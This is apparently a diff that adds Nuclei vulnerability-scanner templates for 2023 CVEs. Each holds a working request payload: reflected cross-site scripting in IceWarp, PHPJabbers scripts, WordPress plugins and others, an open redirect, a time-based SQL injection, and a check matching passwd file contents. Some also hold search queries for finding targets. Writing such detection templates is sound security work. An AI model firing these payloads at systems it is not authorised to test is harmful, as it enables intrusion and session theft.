regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body_1
|
||||||
|
words:
|
||||||
|
- 'rConfig'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
part: header_3
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-39700
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39700
|
||||||
|
- https://cwe.mitre.org/data/definitions/79.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-39700
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.title:"IceWarp Server Administration"
|
||||||
|
tags: cve,cve2023,icewarp,xss,unauth
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "text/html")'
|
||||||
|
- 'contains(body, "><img src=x onerror=confirm(document.cookie)>") && contains(body, "IceWarp")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2023-40208
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stock Ticker <= 3.23.2 - Cross-Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
|
||||||
|
remediation: Fixed in version 3.23.3
|
||||||
|
reference:
|
||||||
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting
|
||||||
|
- https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability
|
||||||
|
- https://wordpress.org/plugins/stock-ticker/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40208
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-40208
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "stock_ticker"
|
||||||
|
- "onmousemove=alert(document.domain)"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2023-40779
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.
|
||||||
|
reference:
|
||||||
|
- https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40779
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-40779
|
||||||
|
cwe-id: CWE-601
|
||||||
|
cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: title:"IceWarp"
|
||||||
|
tags: cve,cve2023,icewarp,redirect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/%5coast.pro/%2f%2e%2e"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-4110
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.
|
||||||
|
reference:
|
||||||
|
- http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html
|
||||||
|
- https://vuldb.com/?id.235957
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4110
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4110
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,phpjabber,jabber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "Booking", "Arrival", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-4111
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://vuldb.com/?id.235958
|
||||||
|
- https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4111
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4111
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,phpjabber,jabber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains_all(body, "You have an error in your SQL syntax", "><script>alert(document.domain)</script>")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2023-4112
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=39750
|
||||||
|
- https://cxsecurity.com/ascii/WLB-2023080012
|
||||||
|
- http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4112
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4112
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: html:"PHP Jabbers.com"
|
||||||
|
tags: cve,cve2023,xss,unauth,phpjabbers
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-4113
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.
|
||||||
|
reference:
|
||||||
|
- http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4113
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4113
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,php,jabbers
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "Select Service(s)", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-4114
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=39749
|
||||||
|
- http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4114
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4114
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,php,jabbers
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2023-4115
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=39747
|
||||||
|
- https://cxsecurity.com/ascii/WLB-2023080015
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4115
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4115
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,phpjabber,jabber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "Enquiry summary", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2023-4116
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=39746
|
||||||
|
- https://cxsecurity.com/ascii/WLB-2023080016
|
||||||
|
- http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4116
|
||||||
|
- https://vuldb.com/?ctiid.235963
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-4116
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: html:"PHP Jabbers.com"
|
||||||
|
tags: cve,cve2023,xss,phpjabbers
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "Passengers", "Drop-off address", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2023-4148
|
||||||
|
info:
|
||||||
|
name: Ditty < 3.1.25 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
|
||||||
|
remediation: Fixed in version 3.1.25
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4148
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cve-id: CVE-2023-4148
|
||||||
|
cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
publicwww-query: "/wp-content/plugins/ditty-news-ticker/"
|
||||||
|
tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"><script>alert(/XSS/)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains(body_2, "<script>alert(/XSS/)</script>") && contains(body_2, "ditty")'
|
||||||
|
- 'contains(content_type_2, "text/html")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-41538
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.
|
||||||
|
reference:
|
||||||
|
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41538
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-41538
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,xss,phpjabber,jabber
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "New Question", "><script>alert(document.domain)</script>")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2023-4168
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adlisting Classified Ads 2.14.0 - Information Disclosure
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/51667
|
||||||
|
- https://templatecookie.com/demo/adlisting-classified-ads-script
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4168
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2023-4168
|
||||||
|
cwe-id: CWE-200
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: cve,cve2023,adlisting,exposure
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "google_map_key", "api_key", "auth_domain")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,43 @@
|
||||||
|
id: CVE-2023-4547
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://spa-cart.com
|
||||||
|
- https://cxsecurity.com/ascii/WLB-2023080090
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4547
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 3.5
|
||||||
|
cve-id: CVE-2023-4547
|
||||||
|
cwe-id: CWE-79
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2023,spa-cart,unauth,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '100-1331"><script>alert(document.cookie)</script>'
|
||||||
|
- '<table class="products-nav">'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2023-4974
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Academy LMS 6.2 - SQL Injection
|
||||||
|
author: theamanrawat
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
|
||||||
|
reference:
|
||||||
|
- https://demo.creativeitem.com/academy/
|
||||||
|
- https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4974
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
|
||||||
|
cvss-score: 6.3
|
||||||
|
cve-id: CVE-2023-4974
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"Academy LMS"
|
||||||
|
tags: cve,cve2023,sqli,academy,lms
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- duration>=7
|
||||||
|
- status_code == 500
|
||||||
|
- contains(body, "Courses</span>")
|
||||||
|
condition: and
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2023-5244
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Microweber < V.2.0 - Cross-Site Scripting
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.
|
||||||
|
reference:
|
||||||
|
- https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/
|
||||||
|
- https://vuldb.com/?id.240778
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5244
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cwe-id: CWE-79
|
||||||
|
cve-id: CVE-2023-5244
|
||||||
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: http.favicon.hash:780351152
|
||||||
|
tags: cve,cve2023,xss,microweber
|
||||||
|
|
||||||
|
http:
